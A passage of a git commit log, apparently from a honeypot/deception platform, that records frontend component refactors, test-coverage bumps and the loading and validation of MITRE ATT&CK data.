  pass mitre_url=_mitre_url_for(sub_technique_id or technique_id)
  alongside the existing technique_name resolution.
- api_get_tag_details.py needs no change:
  list_tags_by_scope_and_technique already returns model_dump() rows
  that flow the new column through **row spread to TTPTagDetailRow.
- tests/ttp/test_emit_attaches_mitre_url.py covers both construction
  paths (top-level, sub-tech, unknown, multi-emit) and a regression
  test that intel_lifter evidence dicts no longer contain mitre_url.
2026-05-09 06:40:08 -04:00
9675f4bf92 refactor(decnet_web/MazeNET): bump coverage floor after Inspector split
Suite is now 51 files / 259 tests, 25.68% lines / 21.43% branches.
Floor: lines 24->25, functions 21->22, branches 19->21,
statements 23->24. Inspector/index.tsx ends at 172 LOC, the only
other > 250 LOC file in MazeNET/ is NodeInspector (362) — the
node branch was the bulk of the original 606 LOC and its 7
add-service / tarpit form states stay co-located there.
2026-05-09 06:34:02 -04:00
4fbce6a8b0 refactor(decnet_web/MazeNET): split Inspector by selection type
Inspector.tsx (606 LOC) splits into Inspector/{NetInspector,
NodeInspector, EdgeInspector, ServiceInspector, index}.tsx plus
types.ts. The dispatcher (index.tsx) owns the title bar, the empty
state, the activeNetIds derivation, the pending-diff block, and the
topology-status block; each per-type panel takes only the props it
needs. NodeInspector keeps the 7 useStates for the add-service /
tarpit forms since they are node-only.

10 new dispatcher-level tests cover empty / node / net / edge /
service / observed-entity / internet-net / live-ops gating /
tarpit-controls / pending-diff. Selection type re-exported from
Inspector/index.tsx so MazeNET.tsx, Canvas.tsx, and
useMazeContextMenu.tsx keep their existing import path.
2026-05-09 06:33:12 -04:00
e50474cb66 feat(ttp): add mitre_url_for + groups_using_technique helpers
Two reusable bundle-derived lookups that the next two commits build
on:

- mitre_url_for(tid) returns the canonical attack.mitre.org URL by
  reading external_references on the cached attack-pattern. Backed
  by the existing lru-cached _attack_pattern_by_id so per-call cost
  is constant. Handles top-level techniques and sub-techniques
  (T1059.004 -> .../techniques/T1059/004).
- GroupRef + groups_using_technique(tid) surface the intrusion-set
  reverse index from the loaded bundle: given a technique, return
  the MITRE-tracked groups documented as using it. Sorted by
  group_id for deterministic responses; lru-cached. Sub-technique
  semantics match ATT&CK Navigator (do NOT auto-union with parent).
- decnet/ttp/data/intel_loader._mitre_url_for collapses to a thin
  re-export of attack_stix.mitre_url_for; the loader keeps mitre_url
  on TechniqueEmission for the eventual STIX export.
- tests/ttp/test_attack_url.py covers both helpers: top-level + sub
  URLs, unknown -> None / (), GroupRef immutability + hashability,
  deterministic ordering, sub-technique distinct from parent.
2026-05-09 06:32:04 -04:00
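A minimal sketch of the two lookups described in the commit above, run against a toy in-memory bundle rather than the real ATT&CK data. The `_BUNDLE` list, the `G9001`/`G9002` group IDs, the group names, and the exact field layout of `GroupRef` are assumptions made for illustration; only the function names, the lru-caching, the sorting by `group_id`, and the "no auto-union with parent" rule come from the commit message.

```python
from dataclasses import dataclass
from functools import lru_cache
from typing import Optional

# Toy stand-in for the loaded STIX bundle. Group IDs and names are made up.
_BUNDLE = [
    {"type": "attack-pattern", "id": "attack-pattern--a",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1059",
                              "url": "https://attack.mitre.org/techniques/T1059"}]},
    {"type": "attack-pattern", "id": "attack-pattern--b",
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1059.004",
                              "url": "https://attack.mitre.org/techniques/T1059/004"}]},
    {"type": "intrusion-set", "id": "intrusion-set--y", "name": "Example Group B",
     "external_references": [{"source_name": "mitre-attack", "external_id": "G9002"}]},
    {"type": "intrusion-set", "id": "intrusion-set--x", "name": "Example Group A",
     "external_references": [{"source_name": "mitre-attack", "external_id": "G9001"}]},
    {"type": "relationship", "relationship_type": "uses",
     "source_ref": "intrusion-set--x", "target_ref": "attack-pattern--a"},
    {"type": "relationship", "relationship_type": "uses",
     "source_ref": "intrusion-set--y", "target_ref": "attack-pattern--a"},
    {"type": "relationship", "relationship_type": "uses",
     "source_ref": "intrusion-set--y", "target_ref": "attack-pattern--b"},
]


def _mitre_ref(obj: dict) -> Optional[dict]:
    """Return the object's 'mitre-attack' external reference, if any."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref
    return None


@lru_cache(maxsize=None)
def _attack_pattern_by_id(tid: str) -> Optional[dict]:
    """Find the attack-pattern whose ATT&CK external_id equals tid."""
    for obj in _BUNDLE:
        if obj["type"] == "attack-pattern":
            ref = _mitre_ref(obj)
            if ref is not None and ref.get("external_id") == tid:
                return obj
    return None


def mitre_url_for(tid: str) -> Optional[str]:
    """Canonical attack.mitre.org URL, or None for an unknown technique."""
    obj = _attack_pattern_by_id(tid)
    ref = _mitre_ref(obj) if obj is not None else None
    return ref.get("url") if ref is not None else None


@dataclass(frozen=True)  # frozen makes instances immutable and hashable
class GroupRef:
    group_id: str
    name: str


@lru_cache(maxsize=None)
def groups_using_technique(tid: str) -> tuple:
    """Groups with a direct 'uses' relationship to tid (parent not unioned)."""
    pattern = _attack_pattern_by_id(tid)
    if pattern is None:
        return ()
    sets = {o["id"]: o for o in _BUNDLE if o["type"] == "intrusion-set"}
    found = set()
    for rel in _BUNDLE:
        if (rel["type"] == "relationship"
                and rel.get("relationship_type") == "uses"
                and rel.get("target_ref") == pattern["id"]
                and rel.get("source_ref") in sets):
            grp = sets[rel["source_ref"]]
            found.add(GroupRef(_mitre_ref(grp)["external_id"], grp["name"]))
    return tuple(sorted(found, key=lambda g: g.group_id))
```

In this toy bundle the sub-technique T1059.004 resolves only to the one group linked to it directly, while the parent T1059 resolves to both groups, which mirrors the distinct-from-parent behaviour the tests are said to cover.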
0a9a2f9021 refactor(decnet_web/AttackerDetail): trim shell + bump coverage floor
Drop unused icon/api/useEffect/Tag imports left behind by the
fingerprint, behaviour, and IntelPanel extractions. AttackerDetail.tsx
ends at 450 LOC across Phase 10 (down from 1652 / 73% reduction).
Coverage floor: lines 23->24, functions 20->21, branches 17->19,
statements 22->23.
2026-05-09 06:29:15 -04:00
4bd502d3bf refactor(decnet_web/AttackerDetail): lift IntelPanel
Move IntelPanel + IntelRow type + ProviderRow + VERDICT_TONE/fmtTs
helpers into AttackerDetail/IntelPanel/. AttackerDetail.tsx drops
from 680 to 449 LOC. New IntelPanel.test.tsx covers the loading,
absent (404), error (500), and ok states with MSW handlers.
2026-05-09 06:27:59 -04:00
e92d415304 refactor(decnet_web/AttackerDetail): lift behaviour panel block
Move BehaviouralPrimitivesPanel + 9 sub-components (BehaviorHeadline,
BeaconBlock, DetectedToolsBlock, TcpStackBlock, TimingStatsBlock,
PhaseSequenceBlock, AttributionBadge, KeyValueRow, StatBlock) plus
the OS_LABELS / BEHAVIOR_LABELS / TOOL_LABELS / BEHAVIOUR_DOMAIN_*
lookup tables and fmtOpt/fmtSecs into AttackerDetail/behaviour/.
AttackerDetail.tsx drops from 1220 to 680 LOC; existing
behaviour_panel test moves to behaviour/BehaviouralPrimitivesPanel.test.tsx
and now imports from the canonical location. The shell still
re-exports BehaviouralPrimitivesPanel for source compatibility.
2026-05-09 06:25:53 -04:00
1f3f58c42c refactor(decnet_web/AttackerDetail): lift fingerprint renderers + tests
Move 12 Fp* components, FingerprintGroup, getPayload, seqClassColor,
HashRow, fpType lookups, and UA color tables into
AttackerDetail/fingerprints/. AttackerDetail.tsx drops from 1652
to 1220 LOC; the orchestrator now imports the same helpers it used
to define inline. 10 new tests covering UA / HTTP-quirks / resumption
/ certificate / spoofed-source / TCP-stack / dispatch fallback.
2026-05-09 06:21:44 -04:00
d25f69ba1b feat(ttp): extract intel_lifter provider mappings to YAML data + ATT&CK external_reference enrichment
The four provider→technique tables (AbuseIPDB cat→techniques,
GreyNoise tag→techniques, ThreatFox threat_type→techniques, plus
the Feodo binary-listed signal) used to live as Final[dict] constants
in intel_lifter.py. Two real problems with that:

1. Drift between rules/ttp/R0054.yaml..R0058.yaml (which declare
   the full slate per provider) and the Python dicts (which decide
   which slate-member fires per signal). The v2 audit comment in
   intel_lifter.py documented that they had silently drifted.
2. No ATT&CK provenance on emissions — the loaded STIX bundle has
   rich external_references (canonical attack.mitre.org URLs) that
   never surfaced because the lifter had no path back to them.

Mappings now live as YAML at decnet/ttp/data/intel/{provider}.yaml,
validated at load against the loaded ATT&CK bundle, with each entry
enriched by attack_stix._attack_pattern_by_id to attach the canonical
MITRE URL to every emission.

- decnet/ttp/data/intel_loader.py: pydantic-validated schema +
  ProviderMapping/Signal/TechniqueEmission frozen dataclasses +
  load_provider_mapping(provider) lru-cached.
- Per-technique high_score_threshold inlined into YAML
  (collapses the separate _ABUSEIPDB_HIGH_SCORE_GATED dict).
- external_reference field follows the STIX 2.1 external-reference
  shape (source_name + url + optional external_id) so the future
  STIX/MISP exporter is a direct translation.
- intel_lifter.py: dicts deleted, decision functions read from
  ProviderMapping accessors. Decision-flow constants (T1071/T1595
  bare-classification fallbacks in _greynoise_decisions) stay in
  code — they're not table rows.
- Each emit slot's evidence_extra now carries mitre_url for any
  technique resolved in the bundle (every one in practice).
- tests/ttp/test_intel_mappings.py: snapshot equivalence vs the
  legacy dicts, high-score gate behavior, every-signal-has-an-
  external-reference, every-emission-has-a-mitre-url, negative
  paths (unknown technique_id raises AttackBundleError, mismatched
  provider field rejected, dir listing matches expected providers).

The YAML schema + mitre_url enrichment lays groundwork for the
future STIX exporter; this commit does NOT build that exporter.
2026-05-09 06:18:25 -04:00
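The mapping design in the commit above (frozen dataclasses, a per-technique high_score_threshold, validation against the bundle at load) could look roughly like the following. This is a sketch under stated assumptions: the real loader is pydantic-validated and reads YAML, whereas this version takes an already-parsed dict and uses only the standard library; `build_mapping`, `emissions_for`, the `brute_force` signal key, the threshold of 90, and the field names are hypothetical.

```python
from dataclasses import dataclass
from typing import Optional


class AttackBundleError(Exception):
    """Raised when a mapping names a technique the bundle does not contain."""


@dataclass(frozen=True)
class TechniqueEmission:
    technique_id: str
    mitre_url: str
    high_score_threshold: Optional[int] = None  # None means "always emit"


@dataclass(frozen=True)
class Signal:
    key: str
    emissions: tuple


@dataclass(frozen=True)
class ProviderMapping:
    provider: str
    signals: tuple

    def emissions_for(self, key: str, score: int = 0) -> tuple:
        """Emissions for a signal, dropping rows gated above the given score."""
        for sig in self.signals:
            if sig.key == key:
                return tuple(
                    e for e in sig.emissions
                    if e.high_score_threshold is None or score >= e.high_score_threshold
                )
        return ()


def build_mapping(expected_provider: str, raw: dict, known_urls: dict) -> ProviderMapping:
    """Validate a parsed mapping and enrich each row with its MITRE URL."""
    if raw.get("provider") != expected_provider:
        raise ValueError(f"provider field {raw.get('provider')!r} != {expected_provider!r}")
    signals = []
    for key, rows in raw["signals"].items():
        emissions = []
        for row in rows:
            tid = row["technique_id"]
            if tid not in known_urls:  # unknown ID: refuse to load
                raise AttackBundleError(f"unknown technique_id {tid}")
            emissions.append(
                TechniqueEmission(tid, known_urls[tid], row.get("high_score_threshold"))
            )
        signals.append(Signal(key, tuple(emissions)))
    return ProviderMapping(expected_provider, tuple(signals))


# Illustrative data only; the real YAML files are not reproduced here.
EXAMPLE_URLS = {
    "T1110": "https://attack.mitre.org/techniques/T1110",
    "T1078": "https://attack.mitre.org/techniques/T1078",
}
EXAMPLE_RAW = {
    "provider": "abuseipdb",
    "signals": {
        "brute_force": [
            {"technique_id": "T1110"},
            {"technique_id": "T1078", "high_score_threshold": 90},
        ]
    },
}
```

Keeping the threshold on the row itself is what lets one table answer both "which techniques belong to this signal" and "which of them fire at this score", so no second gating dict is needed.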
a3f1cea2d6 feat(ttp): fetch + verify MITRE ATT&CK LICENSE alongside the bundle
MITRE's ATT&CK Terms of Use require reproducing their copyright +
license alongside any cached copy of ATT&CK data. Today we ship the
bundle but not the license — this commit closes that compliance gap.

- attack_version.py pins ATTACK_LICENSE_URL +
  ATTACK_LICENSE_SHA256 + ATTACK_LICENSE_FILENAME, sourced from the
  same attack-stix-data repo as the bundle.
- attack_stix.py:_fetch_license downloads LICENSE.txt next to the
  bundle. License sha mismatch is logged + refreshed (license text
  gets occasional formatting tweaks; not a security event), unlike
  the bundle which stays fail-closed.
- _ensure_license is the compliance ratchet: resolve_bundle_path
  refuses to return without LICENSE.txt on disk. Override-mode
  (DECNET_ATTACK_BUNDLE) checks for a sibling LICENSE.txt first,
  then DECNET_ATTACK_LICENSE, then the cache dir.
- python -m decnet.ttp.attack_stix license prints the cached license
  to stdout for operator audit.
- loaded_license_path() exposes the active license path read-only.
- tests/ttp/test_attack_license.py covers happy paths (sibling +
  explicit env), refusal when DECNET_ATTACK_LICENSE points at a
  missing file, the CLI subcommand, and the pinned-sha shape.
2026-05-09 06:17:46 -04:00
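The override-mode lookup order from the commit above (sibling LICENSE.txt, then DECNET_ATTACK_LICENSE, then the cache dir) can be sketched as a small pure function. `find_license` and `LicenseMissingError` are hypothetical names, and the choice to raise immediately when DECNET_ATTACK_LICENSE points at a missing file, rather than falling through to the cache, is an assumption drawn from the test description, not confirmed behaviour.

```python
from pathlib import Path
from typing import Mapping

LICENSE_NAME = "LICENSE.txt"


class LicenseMissingError(RuntimeError):
    """Raised when no license file can be located for the active bundle."""


def find_license(bundle_path: Path, env: Mapping[str, str], cache_dir: Path) -> Path:
    """Locate the license for an operator-supplied bundle, or refuse."""
    # 1. A LICENSE.txt sitting next to the bundle wins.
    sibling = bundle_path.parent / LICENSE_NAME
    if sibling.is_file():
        return sibling

    # 2. An explicit path from the environment (assumed to be fail-closed).
    explicit = env.get("DECNET_ATTACK_LICENSE")
    if explicit:
        explicit_path = Path(explicit)
        if explicit_path.is_file():
            return explicit_path
        raise LicenseMissingError(f"DECNET_ATTACK_LICENSE not found: {explicit}")

    # 3. Fall back to the copy in the cache directory.
    cached = cache_dir / LICENSE_NAME
    if cached.is_file():
        return cached

    raise LicenseMissingError("no LICENSE.txt available for the ATT&CK bundle")
```

Passing the environment in as a mapping instead of reading os.environ directly keeps the function easy to exercise in tests without patching global state.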
b326d70852 refactor(decnet_web/Credentials): wire shell + bump coverage floor
Credentials.tsx: 487 -> 231 LOC. Page now composes CredsTable +
ReuseTable + useCredentials hook; URL-derived state (tab, query,
service, page) and selection/sort UI are the only concerns left
in the shell.
2026-05-09 06:12:58 -04:00
bf79581cc9 refactor(decnet_web/Credentials): extract CredsTable + ReuseTable + SortTh 2026-05-09 06:11:38 -04:00
e29a0094c9 refactor(decnet_web/Credentials): add useCredentials data hook 2026-05-09 06:10:53 -04:00
275fac5288 refactor(decnet_web/Credentials): extract types + helpers with tests 2026-05-09 06:09:57 -04:00
2c1ccec8fa refactor(decnet_web/SwarmHosts): wire shell + bump coverage floor
SwarmHosts.tsx: 513 -> 161 LOC. Page now composes EnrollmentWizard
+ useSwarmHosts hook; only the arm/confirm UI affordance and the
busy-set tracking remain in the shell.
2026-05-09 06:08:48 -04:00
780d395a46 refactor(decnet_web/SwarmHosts): add useSwarmHosts polled data hook 2026-05-09 06:07:38 -04:00
9def7fd22f refactor(decnet_web/SwarmHosts): extract EnrollmentWizard 2026-05-09 06:06:29 -04:00
3a8519b2a1 refactor(decnet_web/SwarmHosts): extract types + helpers with tests 2026-05-09 06:05:19 -04:00
31f4c54c32 refactor(decnet_web/Webhooks): wire shell + bump coverage floor
Webhooks.tsx: 642 -> 387 LOC. Page now composes FormRow + SecretModal
+ useWebhooks hook; toast policy is the only UI concern left in the
shell. Multi-select delete uses the hook's reload internally.
2026-05-09 06:04:14 -04:00
7408a04a90 refactor(decnet_web/Webhooks): add useWebhooks data hook 2026-05-09 06:02:37 -04:00
1ac64d2ae2 refactor(decnet_web/Webhooks): extract FormRow + SecretModal 2026-05-09 06:01:47 -04:00
432057f44a feat(ttp): fail-closed validation that lifter+UKC IDs resolve in ATT&CK bundle
Drift between the technique/tactic IDs hardcoded in the lifters and
what the loaded ATT&CK STIX bundle actually contains is silent in the
status quo: a renamed-or-retired technique just stops being tagged.
Every emission point now has an explicit validator that asserts its
IDs resolve in the loaded bundle, called once at TTP-worker boot.

- intel_lifter.all_emitted_technique_ids() collects every technique
  the four provider tables (AbuseIPDB / GreyNoise / Feodo / ThreatFox)
  plus the decision-flow constants in _greynoise_decisions and
  _feodo_decisions can emit. validate_against_attack_bundle() runs it
  through attack_stix.assert_known_technique_ids().
- ukc.validate_against_attack_bundle() asserts every key in
  ATTACK_TACTIC_TO_UKC resolves, with TA0100..TA0106 documented as
  _NON_ENTERPRISE_TACTICS (they live in the ICS bundle, not the
  enterprise bundle DECNET loads).
- decnet/ttp/worker.py:run_ttp_worker_loop calls both validators
  before subscribing to the bus. A bundle-vs-code mismatch refuses
  to start the worker rather than silently mistagging events.
- tests/ttp/test_attack_bundle_validation.py covers the happy path
  for both validators, the negative path (injected bogus tactic ID
  raises AttackBundleError), the ICS exemption, and the lone T1078
  reference in credential_lifter.
2026-05-09 05:58:06 -04:00
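The boot-time check described in the commit above amounts to a set difference followed by a refusal to start. The sketch below assumes simplified signatures: `assert_known_technique_ids` here takes the known IDs as an argument, and `validate_tactic_map` and `boot_worker` are hypothetical helpers standing in for the real validators and worker loop.

```python
from typing import Callable, Iterable


class AttackBundleError(Exception):
    """Raised when code references an ID the loaded bundle does not contain."""


def assert_known_technique_ids(ids: Iterable[str], known: Iterable[str]) -> None:
    """Raise if any ID is absent from the bundle; list every offender."""
    unknown = sorted(set(ids) - set(known))
    if unknown:
        raise AttackBundleError("IDs not in ATT&CK bundle: " + ", ".join(unknown))


# TA0100..TA0106 are exempt because they belong to the ICS bundle.
NON_ENTERPRISE_TACTICS = frozenset(f"TA{n:04d}" for n in range(100, 107))


def validate_tactic_map(tactic_to_ukc: dict, known_tactics: Iterable[str]) -> None:
    """Check every mapped tactic resolves, skipping the ICS-only ones."""
    to_check = [t for t in tactic_to_ukc if t not in NON_ENTERPRISE_TACTICS]
    assert_known_technique_ids(to_check, known_tactics)


def boot_worker(validators: Iterable[Callable[[], None]],
                subscribe: Callable[[], None]) -> None:
    """Run every validator first; subscribe to the bus only if all pass."""
    for validate in validators:
        validate()  # an AttackBundleError here aborts startup
    subscribe()
```

Because the validators run before `subscribe`, a mismatch surfaces as a startup failure instead of as events that silently lose their tags.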
d743d38cac feat(ttp): load MITRE ATT&CK from official STIX 2.1 bundle
Replace the hand-maintained TECHNIQUE_NAMES dict (pinned to v15.1) with
a runtime loader that reads the official enterprise-attack-N.json STIX
bundle. Version bumps now require only updating attack_version.py;
sub-technique parents, tactic IDs, and kill-chain phases all come from
MITRE's published data.

- decnet/ttp/attack_version.py pins version 19.0 + sha256 + URL
- decnet/ttp/attack_stix.py is the lazy STIX loader. Resolution order:
  DECNET_ATTACK_BUNDLE env -> ~/.cache/decnet/attack/ -> fetch from
  the pinned MITRE GitHub URL. SHA-256 verified before parse;
  mismatch fails closed.
- decnet/ttp/attack_catalog.py collapses to a shim re-exporting
  technique_name() so the ~9 router/repo call sites don't churn.
- python -m decnet.ttp.attack_stix fetch warms the cache and can
  print sha256 for version-bump workflows.
- test_attack_catalog.py now asserts every rule-emitted ID resolves
  in the loaded bundle (same contract, real source) and exercises
  the SHA-256-mismatch fail-closed path.
2026-05-09 05:54:36 -04:00
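"SHA-256 verified before parse; mismatch fails closed" in the commit above can be sketched in a few lines of standard-library Python. `load_verified_bundle` is a hypothetical name, and the real loader's env/cache/fetch resolution order is not reproduced here; the sketch only shows hashing the raw bytes and refusing to parse on a mismatch.

```python
import hashlib
import json
from pathlib import Path


class AttackBundleError(Exception):
    """Raised when the bundle on disk does not match the pinned digest."""


def load_verified_bundle(path: Path, expected_sha256: str) -> dict:
    """Hash the raw bytes first; parse JSON only if the digest matches."""
    raw = Path(path).read_bytes()
    digest = hashlib.sha256(raw).hexdigest()
    if digest != expected_sha256.lower():
        # Fail closed: never hand unverified data to the parser.
        raise AttackBundleError(
            f"sha256 mismatch for {path}: expected {expected_sha256}, got {digest}"
        )
    return json.loads(raw)
```

Hashing the bytes exactly as read, before any decoding, means the pinned digest covers the same content the parser will see.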
44f4dd8c85 refactor(decnet_web/Webhooks): extract types + helpers with tests 2026-05-09 05:49:34 -04:00
ac64329a13 refactor(decnet_web/PersonaGeneration): wire shell + bump coverage floor
PersonaGeneration.tsx: 875 -> 357 LOC. Page now composes the data
hook + PersonaCard + PersonaEditor; bulk-import helpers stay in
helpers.ts; toast policy is the only UI concern left in the shell.
2026-05-09 05:48:16 -04:00
c1a65bf9a3 refactor(decnet_web/PersonaGeneration): add usePersonaGeneration data hook 2026-05-09 05:46:08 -04:00
97e72d975b refactor(decnet_web/PersonaGeneration): extract PersonaCard + PersonaEditor 2026-05-09 05:45:10 -04:00
a19d8bba17 refactor(decnet_web/PersonaGeneration): extract types + helpers with tests 2026-05-09 05:43:59 -04:00
6e0e1c204e refactor(decnet_web/MazeNET): wire hooks + bump coverage floor
Final integration step. The MazeNET page shell is now a thinner
composition of the existing module-level hooks (useMazeApi,
useMazeInteraction, useTopologyEditor, useTopologyStream,
useLayoutPersistor) PLUS the three new ones from this phase
(useFullscreenMode, useTopologyData, useMazeContextMenu).

- MazeNET.tsx: 980 -> 715 LOC. The fullscreen + body-class
  effects, the topology hydrate / SSE stream / deploy /
  flashErr plumbing, and the four context-menu builders are
  all gone from the shell.
- Page still owns the per-operation editor callbacks
  (removeNet/Node/Edge, duplicateNode, addServiceToNode, etc.)
  because they need direct access to setNodes/setEdges/setNets
  for optimistic patches alongside their REST calls — those
  setters are exposed by useTopologyData for that reason.

Coverage floor bumped after the phase:

  lines       17 -> 19
  functions   15 -> 17
  branches    13 -> 14
  statements  16 -> 18

Phase 5 final scoreboard: 37 test files, 172 tests, all green.
2026-05-09 05:39:32 -04:00
f33a011900 refactor(decnet_web/MazeNET): extract useMazeContextMenu
Lift the context-menu builder out of the page shell. The hook
owns ctxMenu open/close state and exposes one builder per
surface (node / net / edge / canvas); the actual operations come
in via callbacks so the page keeps its optimistic-patch logic
unchanged.

- New MazeNET/useMazeContextMenu.tsx
- useMazeContextMenu.test.ts covers menu lifecycle (open/close),
  node-menu items, observed-entity locking, internet-net
  delete-disabled, canvas-menu Add subnet/DMZ items, and the
  edge-menu Remove invocation.
- Wiring into MazeNET.tsx lands next.
2026-05-09 05:34:58 -04:00
5f2a3f4629 refactor(decnet_web/MazeNET): extract useTopologyData
Lift the canvas data plane off the page shell. The hook owns:

  GET /topologies/:id            (hydrates nets/nodes/edges + meta)
  GET services + archetypes      (catalogs, with bundled fallback)
  POST /topologies/:id/deploy
  /topologies/:id/events SSE     (open only when active/degraded)
  flashErr() banner timer        (auto-clears actionErr after 4s)

State setters for nets / nodes / edges are returned so the
per-operation callbacks living in the page can optimistically
patch local state alongside their REST calls (matches the
existing pattern; wholesale lift would mean dragging every
mutation along too).

- New MazeNET/useTopologyData.ts
- useTopologyData.test.ts covers hydrate, loadErr surfacing,
  streamEnabled gating on active/degraded, onDeploy success +
  error paths, and the flashErr 4s auto-clear with fake timers.
- Wiring into MazeNET.tsx lands in the next commit.
2026-05-09 05:33:19 -04:00
212feb49e2 refactor(decnet_web/MazeNET): extract useFullscreenMode
Lift the four fullscreen-related side-effects off the page shell.
The hook owns:

  1. body class toggle so page CSS can hide its chrome
  2. browser fullscreen API request/exit (failures ignored)
  3. fullscreenchange listener so F11/Esc from outside our button
     keeps internal state in sync
  4. Esc keystroke handler

Returns { fullscreen, setFullscreen, toggle }.

- New MazeNET/useFullscreenMode.ts
- useFullscreenMode.test.ts (jsdom) covers initial toggle, body
  class lifecycle, Esc-to-exit, and unmount cleanup.
- MazeNET.tsx loses ~30 LOC of inline state + effects.
2026-05-09 05:31:39 -04:00
171e20e427 refactor(decnet_web/Config): wire hook + bump coverage floor
Final integration. The page shell is now a thin composition of
useConfig + the previously-extracted children:

- Config.tsx: 989 -> 131 LOC. Page owns only the activeTab state
  (and the "drop the users tab if the server didn't send users"
  effect). Every form lives inside its tab; toast wiring lives
  in AppearanceTab; window.alert calls live inside UsersTab.
- Tabs receive their `onSave* / onAddUser / ...` callbacks
  directly from the hook — no intermediate wrapper handlers.

Coverage floor bumped after the split:

  lines       14 -> 17
  functions   13 -> 15
  branches    11 -> 13
  statements  13 -> 16

Phase 4 final scoreboard: 34 test files, 156 tests, all green.
2026-05-09 05:27:47 -04:00
4a9cd90f90 refactor(decnet_web/Config): extract AppearanceTab
APPEARANCE panel — accent-color picker — into its own tab. State
is local since no other tab cares about the value; localStorage
persistence + the document.documentElement[data-accent] mirror
move along with it.

- New Config/tabs/AppearanceTab.tsx
- AppearanceTab.test.tsx covers the matrix default, reading the
  saved accent from localStorage on mount, and the click-to-flip
  flow writing both localStorage and the html data-accent attr.
2026-05-09 05:26:26 -04:00
ccae1612bd refactor(decnet_web/Config): extract GlobalsTab + DangerZone
GLOBAL VALUES panel + the developer-mode-gated DANGER ZONE
(reinit) into one tab file. Two stacked panels because they're
the two pieces of UX you ever see together on the globals tab;
splitting them into separate components would force the page
shell to re-pick the gating predicate.

- New Config/tabs/GlobalsTab.tsx (mutation-interval + DangerZone
  inline, since DangerZone is reinit-specific and won't be reused)
- GlobalsTab.test.tsx covers interval-format validation, the
  DANGER ZONE gating on developer_mode, the two-step reinit
  confirm flow, the totals chip ("PURGED: N logs, N bounties,
  N attacker profiles") on success, and viewer-mode rendering.
2026-05-09 05:25:49 -04:00
be35228191 refactor(decnet_web/Config): extract UsersTab
USER MANAGEMENT panel into its own tab. Owns the per-row UI
state (delete-confirm, reset-password popup) plus the add-user
form state; mutations come in via prop. Errors on per-row
operations stay on window.alert (matches existing behavior); the
add form uses the inline FormMsg chip.

- New Config/tabs/UsersTab.tsx
- UsersTab.test.tsx covers row rendering with the must-change
  badge, the two-step delete confirm flow, the add-user submit
  payload (trimmed username + selected role), and the success
  chip after a successful add.
2026-05-09 05:24:55 -04:00
8807da218b refactor(decnet_web/Config): extract LimitsTab
DEPLOYMENT LIMITS panel into its own tab file. Owns the input
state, preset-button shortcuts, and the inline FormMsg chip; the
hook mutation is passed in via prop so this component is fully
reusable as a presentation-only piece.

- New Config/tabs/LimitsTab.tsx
- LimitsTab.test.tsx covers viewer-vs-admin rendering, the
  1-500 validation message, and success/error chip display.
2026-05-09 05:23:42 -04:00
f2fd314dd6 refactor(decnet_web/Config): extract useConfig data hook
Lift the GET /config fetch and every admin-side mutation off the
page shell:

  GET    /config
  PUT    /config/deployment-limit
  PUT    /config/global-mutation-interval
  POST   /config/users
  DELETE /config/users/:uuid
  PUT    /config/users/:uuid/role
  PUT    /config/users/:uuid/reset-password
  DELETE /config/reinit (returns { logs, bounties, attackers })

Mutations return { ok: true } | { ok: false; reason: string } so
the upcoming tab components can render the inline FormMsg chip
without touching axios error shapes. reinit additionally returns
the deletion totals so the danger-zone confirmation can echo
"PURGED: N logs, N bounties, N attackers".

- New Config/useConfig.ts
- useConfig.test.ts MSW-covers initial load, isAdmin role
  surfacing, setDeploymentLimit ok + 400 paths, addUser, deleteUser
  refused, and reinit success.
- Wiring into Config.tsx + tab extractions land in follow-up commits.
2026-05-09 05:23:04 -04:00
b1fbf4630e refactor(decnet_web/Config): move WorkersPanel out
Verbatim move of the worker-status pollster (~390 LOC) plus its
RealismBadge sidekick into its own file. Owns its own polling +
stop/start/start-all mutations; toast push comes in via prop so
the parent stays the one source of toast tone.

- New Config/WorkersPanel.tsx
- WorkersPanel.test.tsx (MSW) covers worker-row rendering, the
  BUS OFFLINE banner, and the error panel on /workers 500.
- Config.tsx loses the inline WorkersPanel + RealismBadge plus
  the now-unused icon imports (Square, RefreshCw, Play).
2026-05-09 05:22:10 -04:00
209efd1a74 refactor(decnet_web/Config): extract types
Foundation for the Config split. UserEntry / ConfigData move out
of the page so the upcoming hook + tab extractions can import
without reaching back through Config.tsx. New ConfigTab union and
FormMsg type for the inline success/error chip pattern that
repeats across every admin form on the page.

- New Config/types.ts (UserEntry, ConfigData, ConfigTab, FormMsg)
- Config.tsx loses the inline interfaces and the `as any` cast on
  setActiveTab in the tab-switcher.
2026-05-09 05:19:50 -04:00
6ba12cc571 refactor(decnet_web/CanaryTokens): wire hook + bump coverage floor
Final integration step. The page shell is now a thin composition
of useCanaryTokens + the previously-extracted children:

- CanaryTokens.tsx: 1,334 -> 210 LOC. Page owns only the
  pure-UI state (tab, search/state/scope filters, modal
  visibility, drawer selection, local fileDrops log) and the
  thin handlers that translate hook results into confirm/alert
  prompts. Initial parallel fetch + deleteBlob mutation moved
  to useCanaryTokens in the prior commit.
- Modals plug directly into the hook's optimistic helpers
  (prependToken / prependBlob / markTokenRevoked) so the page
  doesn't reach into the data shape.

Coverage floor bumped after the split:

  lines       11 -> 14
  functions   10 -> 13
  branches     8 -> 11
  statements  11 -> 13

Phase 3 final scoreboard: 28 test files, 131 tests, all green.
2026-05-09 05:17:52 -04:00
c5cbe084cb refactor(decnet_web/CanaryTokens): extract list views
Lift the three tab bodies — tokens, blobs, file drops — into
their own files. Each takes plain props (data + the operations
its rows need), so the page shell stops mixing tab markup with
data plumbing.

- New CanaryTokens/TokenListView.tsx (text search + state/scope
  filter selectors + flat row grid; visibleTokens memo lives here
  now). Exports StateFilter / ScopeFilter union types so the page
  can declare its filter useState with the right shape.
- New CanaryTokens/BlobListView.tsx (delete refused while a token
  references a blob; ref count badge reuses the disabled button).
- New CanaryTokens/FileDropListView.tsx (CLEAR LIST hidden when
  the local log is empty).
- Three companion tests cover empty states, filter behavior,
  delete refused-vs-allowed, and the per-tab callback wiring.

Wiring into CanaryTokens.tsx + the hook lands next.
2026-05-09 05:16:18 -04:00
0c8c74a89d refactor(decnet_web/CanaryTokens): extract useCanaryTokens hook
Lift the parallel initial-load fetch and the deleteBlob mutation
off the page shell. Modal-driven optimistic merges (created
token, uploaded blob, drawer-revoked token) flow through narrow
setter helpers so the modals don't have to know how state is
shaped internally.

  GET    /canary/tokens
  GET    /canary/blobs (silent 403 -> empty list, viewer-friendly)
  GET    /deckies
